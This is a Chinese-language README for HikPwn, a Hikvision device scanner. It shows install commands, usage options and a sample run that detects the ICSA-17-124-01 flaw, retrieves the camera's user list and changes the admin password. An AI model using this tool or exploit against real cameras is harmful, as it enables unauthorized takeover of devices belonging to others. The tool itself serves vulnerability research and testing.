HikPwn,一个简单的海康威视设备扫描器,具有基本漏洞扫描能力,使用 Python 3.8 编写。 该项目源于我在捕获和观察海康威视软件及设备产生的网络流量时产生的好奇心。
git clone https://github.com/4n4nk3/HikPwn.git
cd HikPwn
pip install -r requirements.txt
持续开发中……敬请期待!
用法: hikpwn.py [-h] --interface INTERFACE --address ADDRESS [--active] [--ICSA_17_124_01]
HikPwn,一个简单的海康威视设备扫描器,具有基本漏洞扫描能力,由 Ananke 用 Python 3.8 编写:https://github.com/4n4nk3。
可选参数:
-h, --help 显示此帮助信息并退出
--interface INTERFACE 要使用的网络接口
--address ADDRESS 所选网络接口的 IP 地址
--active 启用“主动”发现
--ICSA_17_124_01 在发现的设备上启用 ICSA-17-124-01 检测
使用 eth0 作为网络接口,IP 地址为 XXX.XXX.XXX.XXX……
[*] 开始 30 秒的被动和主动发现……
================================================================================
[*] 检测到的设备总数:1
XXX.XXX.XXX.XX
================================================================================
[*] 主动发现结果:
设备 #1:
标签 数据
--------------------------------------------------
序列号 xxxxxxxxxxxxxxxxxxxxx
描述 DS-2DE4220IW-D
MAC 地址 XX:XX:XX:XX:XX:XX
IP 地址 XXX.XXX.XXX.XX
正在使用 DHCP false
软件版本 V5.4.3build 160810
DSP 版本 V7.3 build 160801
启动时间 2019-03-01 00:05:33
激活状态 true
密码重置能力 true
================================================================================
[*] 被动发现结果:
设备 #1:
检测到 IP 地址为 XXX.XXX.XXX.XX、MAC 地址为 XX:XX:XX:XX:XX:XX 的设备。
================================================================================
[*] 开始扫描 ICSA-17-124-01……
检查 XXX.XXX.XXX.XX 是否受 ICSA-17-124-01 影响,以及我们是否能获取设备上存在的有效用户列表……
XXX.XXX.XXX.XX 受 ICSA_17_124_01 影响。获取到的用户列表:
user_id 1
user_name admin
priority high
user_level Administrator
是否要利用该漏洞并尝试更改 admin 密码?(y/n)
>>> y
请输入由数字和字母组成的密码(8-12 个字符):
>>>
密码更改成功。
本项目仅供教育目的。请勿用于非法活动。我不支持也不纵容任何非法或不道德的行为,且不对该软件的可能滥用承担责任。